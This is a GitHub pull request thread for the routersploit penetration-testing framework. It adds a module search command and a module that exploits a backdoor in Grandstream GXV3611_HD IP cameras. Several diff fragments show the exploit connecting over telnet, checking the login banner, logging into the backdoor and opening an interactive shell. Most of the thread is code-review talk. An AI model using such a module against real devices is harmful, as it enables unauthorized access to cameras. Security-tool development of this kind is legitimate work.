### PR TITLE
Grandstream GXV3611_HD RCE exploit and search function

### PR DESCRIPTION
**Pull request by jabedude**
This adds a module that exploits Grandstream GXV3611 IP cameras (see [here](https://www.exploit-db.com/exploits/40441/) and [here](http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html)).

I also added a module search function ([#155](https://github.com/reverse-shell/routersploit/issues/155)), I just need to add tab-complete (could you show me where/how that is implemented please? I can't seem to figure it out)
screen shot 2017-01-29 at 9 29 47 pm

Please let me know if any changes need to be made and I'll try to get them done this week! Thanks!

### CODE REVIEW

**Comment by 0BuRner** [comment]
If I'm not mistaken, the files .DS_Store you added with your push are causing some troubles : Travis can't build and they are breaking the auto-complete.
Remove them from from your changes to fix it.

**Comment by jabedude** [comment]
Done! Sorry about that.

File: routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py [hunk 1]
```diff
@@ -0,0 +1,79 @@
...
+        'devices': [
+            'Grandstream GXV3611_HD',
+        ],
+    }
+
+    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')  # target address
+    port = exploits.Option(23, 'Target port')  # default port
+
+    def run(self):
+        try:
```
Comment (lucyoa) [inline routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py]: Remove this try - try & catch should be added to "check" method

File: routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py [hunk 2]
```diff
@@ -0,0 +1,79 @@
...
+                except:
+                    print_error("Failed to log into backdoor.")
+            else:
+                print_error("Exploit failed. Target does not appear vulnerable")
+        except Exception as err:
+            print_error("{}".format(err))
+
+    @mute
+    def check(self):
+        conn = telnetlib.Telnet(self.target, self.port)
```
Comment (lucyoa) [inline routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py]: Add try & catch to check method

File: routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py [hunk 3]
```diff
@@ -0,0 +1,79 @@
...
+        output = conn.read_until("login:")
+        if 'Grandstream' in output:
+            return True
+        else:
```
Comment (lucyoa) [inline routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py]: Remove else statement and just return False at the end

**Comment by lucyoa** [comment]
Hey @jabedude thanks for the contribution - I added few comments about the code

**Comment by jabedude** [comment]
Hey @lucyoa I moved the try-except to the check method and got rid of the unnecessary else!

File: routersploit/interpreter.py [hunk 4]
```diff
@@ -159,6 +159,7 @@ class RoutersploitInterpreter(BaseInterpreter):
     help                        Print this help menu
     use <module>                Select a module for usage
     exec <shell command> <args> Execute a command in a shell
+    search <search term>        Search for appropriate module
```
Comment (fwkz) [inline routersploit/interpreter.py]: Please also add support for `search` command to the completer, you can do that by modifying `suggested_commands()` method, such modification will cause test to fail so you will have to fix them accordingly.

File: routersploit/interpreter.py [hunk 5]
```diff
@@ -456,5 +457,11 @@ def command_help(self, *args, **kwargs):
     def command_exec(self, *args, **kwargs):
         os.system(args[0])
 
+    def command_search(self, *args, **kwargs):
+        for arg in args:
+            matches = [s for s in self.modules if arg in str(s)]
```
Comment (fwkz) [inline routersploit/interpreter.py]: `str(s)` is not necessary, `self.modules` is already list of strings, please take a look at method `__show_modules()`

File: routersploit/interpreter.py [hunk 6]
```diff
@@ -456,5 +457,11 @@ def command_help(self, *args, **kwargs):
...
+        for match in matches:
+            print(match.replace('.', '/'))
```
Comment (fwkz) [inline routersploit/interpreter.py]: Please use print statement provided by the `utils` module e.g `print_info()`, `print_status()`

File: routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py [hunk 7]
```diff
@@ -0,0 +1,78 @@
...
+                conn.read_until("# ")
+                print_success("Authenticaiton Successful")
+                conn.interact()
+            except:
+                print_error("Failed to log into backdoor.")
+        else:
+            print_error("Exploit failed. Target does not appear vulnerable")
+
+    @mute
+    def check(self):
```
Comment (fwkz) [inline routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py]: I believe this method should looks like this
``` python
def check(self):
    try:
        conn = telnetlib.Telnet(self.target, self.port)
    except Exception:
        return False
    else:
        return 'Grandstream' in conn.read_until("login:")
```
pure `except` clause (without `Exception`) would silence `KeyboardInterrupt` as well, I would like to distinguish this situation.

Comment (jabedude) [inline routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py]: Awesome, I made this modification

File: routersploit/interpreter.py (hunk 6 above)
Comment (jabedude) [inline routersploit/interpreter.py]: Ok, I went with utils.print_status()

File: routersploit/interpreter.py (hunk 4 above)
Comment (jabedude) [inline routersploit/interpreter.py]: I added the complete feature! Thank you for your help.

However, after fixing the tests, a number of errors (not fails) popped while testing my commit.  I can't fix it...could you look at the errors?

**Comment by fwkz** [comment]
@jabedude You can consider yourself as part of happy family of RSF contributors! Thanks for the hard work! 🚀 

PS: I had to set completer tests straight myself with separate commit, they are very tricky. We have to work on them to make debugging less painful. :(

**Comment by jabedude** [comment]
Awesome! Thank you for your help with this PR! :+1:

**Pull request merged**